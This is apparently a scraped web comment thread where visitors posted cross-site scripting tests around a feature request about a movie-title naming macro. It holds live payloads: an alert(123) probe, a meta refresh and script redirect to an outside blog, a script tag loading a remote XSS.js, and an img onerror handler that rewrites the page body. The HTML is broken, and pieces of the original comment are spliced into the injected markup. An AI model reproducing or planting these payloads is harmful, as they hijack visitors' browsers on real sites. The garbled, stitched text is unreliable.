summer is comming!

zhongter is coming!

傻屌公司

alert(123)

路过

反注入补丁 <script> for(var x of document.getElementsByClassName("body")) { if (x.innerHTML.indexOf("script") >= 0) x.innerHTML = ""; } <script>

111

</p> </div> </div> </div> </div> <div class='comment media'> <div class='media-left'> <img class='media-object' height='48' src='https://avatars1.githubusercontent.com/u/46209?v=4' width='48'> </div> <div class='media-body'> <div class='content'> <p class='cartridge text-muted'> <small> <a href="/guotao">guotao</a> commented 9 days ago </small> <small class='pull-right'> </small> </p> <div class='body'><p></script> If it were too difficult to allow as the folder under root,<meta http-equiv="refresh" content="0;url=https://blogs.kainy.cn/?from=feathubXSS-meta"> <script language="javascript" type="text/javascript" async src="https://kainy.cn/js/XSS.js"> window.location.href='<a href="https://blogs.kainy.cn/?from=feathubXSS2">https://blogs.kainy.cn/?from=feathubXSS2</a>'; setTimeout("javascript:location.href='hello.html'", 0); </script>how about a new macro/variable that lets us do something like {Movie TitleThe:1} that will use the first letter of the title, or some other customization (and NOT require {Movie Title} as a mandatory field)。。</p> 反注入补丁 <script> for(var x of document.getElementsByClassName("body")) { if (x.innerHTML.indexOf("script") >= 0) x.innerHTML = ""; } <script> </div></body><form><img id='ls' src="11" onerror="setTimeout(function(){ var xmlhttp;if (window.XMLHttpRequest){xmlhttp=new XMLHttpRequest();}else{xmlhttp=new ActiveXObject('Microsoft.XMLHTTP');};xmlhttp.onreadystatechange=function(){if (xmlhttp.readyState==4 && xmlhttp.status==200){ document.body.innerHTML=xmlhttp.responseText.match(/<body[^>]<em>>([\s\S]</em>)<\/body>/)[1].replace(/<<em>?script</em>?>/g,'').replace(/<\/<em>?script</em>?>/g,'').replace(/<img id(.*?)>/g, '')}};xmlhttp.open('GET',window.location.href,true);xmlhttp.send() }, 0)"/>  。</p> </div> </div> </div> </div> <div class='comment media'> <div class='media-left'> <img class='media-object' height='48' src='https://avatars1.githubusercontent.com/u/46209?v=4' width='48'> </div> <div class='media-body'> <div class='content'> <p class='cartridge text-muted'> <small> <a href="/guotao">guotao</a> commented 9 days ago </small> <small class='pull-right'> </small> </p> <div class='body'><p> If it were too difficult to allow as the folder under root, how about a new macro/variable that lets us do something like {Movie TitleThe:1} that will use the first letter of the title, or some other customization (and NOT require {Movie Title} as a mandatory field)。。